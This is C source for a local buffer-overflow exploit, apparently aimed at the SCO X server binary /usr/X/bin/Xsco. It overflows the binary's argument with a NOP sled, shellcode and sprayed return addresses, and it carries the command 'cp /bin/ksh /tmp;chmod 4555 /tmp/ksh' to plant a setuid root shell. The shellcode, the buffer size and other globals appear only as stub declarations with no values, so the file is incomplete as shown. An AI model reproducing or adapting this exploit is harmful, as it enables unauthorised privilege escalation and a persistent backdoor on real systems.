
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int LEN ;
 int SIZE ;
 char* buffer ;
 int esp ;
 int execl (char*,char*,char*,int *) ;
 int get_esp () ;
 int memcpy (char*,char*,int) ;
 int memset (char*,int ,int) ;
 int nop ;
 int offset ;
 int printf (char*,...) ;
 char* shell ;
 int strlen (char*) ;
 scalar_t__ strtol (char*,int *,int ) ;
 scalar_t__ strtoul (char*,int *,int ) ;
 int x86_nop ;

int main (int argc, char *argv[]) {
    int i,len;
    char *cmd = "cp /bin/ksh /tmp;chmod 4555 /tmp/ksh";

    memset(buffer, x86_nop, SIZE);

    len = strlen(cmd); len++; len = -len;
    shell[LEN+0] = (len >> 0) & 0xff;
    shell[LEN+1] = (len >> 8) & 0xff;
    shell[LEN+2] = (len >> 16) & 0xff;
    shell[LEN+3] = (len >> 24) & 0xff;

    if (argc > 1) offset += strtol(argv[1], ((void*)0), 0);
    if (argc > 2) nop += strtoul(argv[2], ((void*)0), 0);
    esp = get_esp();

    buffer[0]=':';
    memcpy(buffer+nop, shell, strlen(shell));
    memcpy(buffer+nop+strlen(shell), cmd,strlen(cmd));
    memcpy(buffer+nop+strlen(shell)+strlen(cmd),"\xff",1);
    for (i = nop+strlen(shell)+1+strlen(cmd); i < SIZE-4; i += 4) {
        *((int *) &buffer[i]) = esp+offset;
    }

    printf("jmp = [0x%x]\toffset = [%d]\tnop = [%d]\n",esp+offset,offset, nop);
    execl("/usr/X/bin/Xsco", "Xsco", buffer, ((void*)0));

    printf("exec failed!\n");
    return 0;
}
